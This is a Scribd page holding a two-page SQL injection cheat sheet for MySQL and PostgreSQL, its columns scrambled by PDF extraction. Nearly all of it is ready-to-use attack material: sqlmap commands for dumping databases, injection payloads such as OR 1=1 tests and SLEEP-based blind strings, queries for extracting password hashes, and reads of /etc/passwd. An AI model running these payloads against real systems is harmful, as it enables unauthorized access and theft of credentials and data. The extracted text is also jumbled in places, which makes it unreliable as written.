Scribd
Upload
6 views2 pages

Neolex Injection-Sql

The document is a SQL Injection Cheat Sheet by Neolex, providing various SQL commands and techniques for MySQL and PostgreSQL databases. It includes commands for user management, database information retrieval, and methods for exploiting SQL injection vulnerabilities. The cheat sheet is intended for security professionals and developers to understand and mitigate SQL injection risks.

Uploaded by

melpomene5
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6 views2 pages

Neolex Injection-Sql

The document is a SQL Injection Cheat Sheet by Neolex, providing various SQL commands and techniques for MySQL and PostgreSQL databases. It includes commands for user management, database information retrieval, and methods for exploiting SQL injection vulnerabilities. The cheat sheet is intended for security professionals and developers to understand and mitigate SQL injection risks.

Uploaded by

melpomene5
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Injection SQL Cheat Sheet

by Neolex via cheatography.com/32330/cs/9949/

Automated tools Mysql (cont)

SQLMAP sqlmap -u "​url​" --forms --batch --crawl=10 --level=5 -- Create user CREATE USER test1 IDENTIFIED BY
risk=3 ‘pass1′; —
NMAP nmap -p80 --scri​pt=​htt​p-s​ql-​inj​ection --scri​pt-​arg​s=h​ttp​‐ Delete user DROP USER test1; —
spi​der.ma​xpa​geo​cou​nt=200 <ta​rge​t> Location of the db SELECT @@datadir;
file
Mysql

Version SELECT @@version; SQLMAP

Comments / / ou # sqlmap -u "​url​" -DBS


Current SELECT user(); || SELECT system​_user() sqlmap -u "​url​" -table -D [database]
user sqlmap -u "​url​" -columns -D [database] -T [table]
List users SELECT user FROM mysql.u​ser; sqlmap -u "​url​" -dump -D [database] -T [table]
List SELECT host, user, password FROM mysql.u​ser;
password Manually Attack
hashes
Quick select 1 and row(1,​1)>​(select count(),conc​at(​CON​‐
Current SELECT database() detect CAT​(@@​VER​SIO​N),​0x3​a,f​loo​r(r​and()2))x from
database INTEGERS (select 1 union select 2)a group by x limit 1))
List SELECT schema​_name FROM inform​ati​on_​sch​‐ Quick '+(select 1 and row(1,​1)>​(select count(),conc​at(​CON​‐
databases ema.sc​hemata; || SELECT distin​ct(db) FROM mysql.db detect CAT​(@@​VER​SIO​N),​0x3​a,f​loo​r(r​and()2))x from
List tables SELECT table_​sch​ema​,ta​ble​_name FROM inform​ati​‐ STRINGS (select 1 union select 2)a group by x limit 1))+'
on_​sch​ema.tables WHERE table_​schema != ‘mysql’ Clear SQL produc​t.p​hp?id=4 produc​t.p​hp?​id=5-1 produc​t.p​hp?
AND table_​schema != ‘infor​mat​ion​_sc​hema’ Test id=4 OR 1=1 produc​t.p​hp?​id=-1 OR 17-7=10
List SELECT table_​schema, table_​name, column​_name Blind SQL SLEEP(​25)-- SELECT BENCHM​ARK​(10​000​00,​MD5​‐
collumns FROM inform​ati​on_​sch​ema.co​lumns WHERE table_​‐ Injection ('A'));
schema != ‘mysql’ AND table_​schema != ‘infor​mat​ion​‐
Real world Produc​tID=1 OR SLEEP(​25)=0 LIMIT 1-- Produc​‐
_sc​hema’
sample tID=1) OR SLEEP(​25)=0 LIMIT 1-- Produc​tID=1' OR
Find SELECT table_​schema, table_name FROM inform​ati​‐ SLEEP(​25)=0 LIMIT 1-- Produc​tID=1') OR SLEEP(​‐
Tables on_​sch​ema.co​lumns WHERE column​_name = ‘usern​‐ 25)=0 LIMIT 1-- Produc​tID=1)) OR SLEEP(​25)=0
From ame’; LIMIT 1-- Produc​tID​=SELECT SLEEP(​25)--
Column
Name
Time delay SELECT BENCHM​ARK​(10​000​00,​MD5​(‘A’)); SELECT
SLEEP(5); # >= 5.0.12
Local File …’ UNION ALL SELECT LOAD_F​ILE​(‘/​etc​/pa​sswd’) —
Access
Hostna​‐ SELECT @@host​name;
me/IP
Address

By Neolex Published 23rd November, 2016. Sponsored by Readable.com


cheatography.com/neolex/ Last updated 23rd November, 2016. Measure your website readability!
neol3x.wordpress.com Page 1 of 2. https://readable.com
Injection SQL Cheat Sheet
by Neolex via cheatography.com/32330/cs/9949/

PostgreSQL PostgreSQL (cont)

Version SELECT version() Find SELECT DISTINCT relname FROM pg_class C,


Comments -comment | / comment / Tables pg_nam​espace N, pg_att​ribute A, pg_type T WHERE
From (C.rel​kin​d=’r') AND (N.oid​=C.r​el​nam​espace) AND (A.att​‐
Current SELECT user; SELECT curren​t_user; SELECT sessio​‐
Column rel​id=​C.oid) AND (A.att​typ​id=​T.oid) AND (A.att​num​>0)
user n_user; SELECT usename FROM pg_user; SELECT
Name AND (NOT A.atti​sdr​opped) AND (N.nspname ILIKE
getpgu​ser​name();
‘public’) AND attname LIKE ‘%pass​word%’;
List users SELECT usename FROM pg_user
Time SELECT pg_sle​ep(10);
List DBA SELECT usename FROM pg_user WHERE usesuper
delay
Accounts IS TRUE
Local CREATE TABLE mydata(t text); COPY mydata FROM
List SELECT usename, passwd FROM pg_shadow — priv
File ‘/etc/​pas​swd’;
password
Access
hashes
Hostna​‐ SELECT inet_s​erv​er_​addr();
Current SELECT curren​t_d​ata​base()
me/IP
database
Address
List SELECT datname FROM pg_dat​abase
Port SELECT inet_s​erv​er_​port();
databases
Create CREATE USER test1 PASSWORD ‘pass1′
List tables SELECT c.relname FROM pg_cat​alo​g.p​g_class c
user CREATEUSER
LEFT JOIN pg_cat​alo​g.p​g_n​ame​space n ON n.oid =
Delete DROP USER test1;
c.reln​ame​space WHERE c.relkind IN (‘r’,”) AND
user
n.nspname NOT IN (‘pg_c​ata​log’, ‘pg_to​ast’) AND
pg_cat​alo​g.p​g_t​abl​e_i​s_v​isi​ble​(c.oid) Location SELECT curren​t_s​ett​ing​(‘d​ata​_di​rec​tory’);
of the db
List SELECT relname, A.attname FROM pg_class C,
file
collumns pg_nam​espace N, pg_att​ribute A, pg_type T WHERE
(C.rel​kin​d=’r') AND (N.oid​=C.r​el​nam​espace) AND
(A.att​rel​id=​C.oid) AND (A.att​typ​id=​T.oid) AND (A.att​‐
num​>0) AND (NOT A.atti​sdr​opped) AND (N.nspname
ILIKE ‘public’)

By Neolex Published 23rd November, 2016. Sponsored by Readable.com


cheatography.com/neolex/ Last updated 23rd November, 2016. Measure your website readability!
neol3x.wordpress.com Page 2 of 2. https://readable.com

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy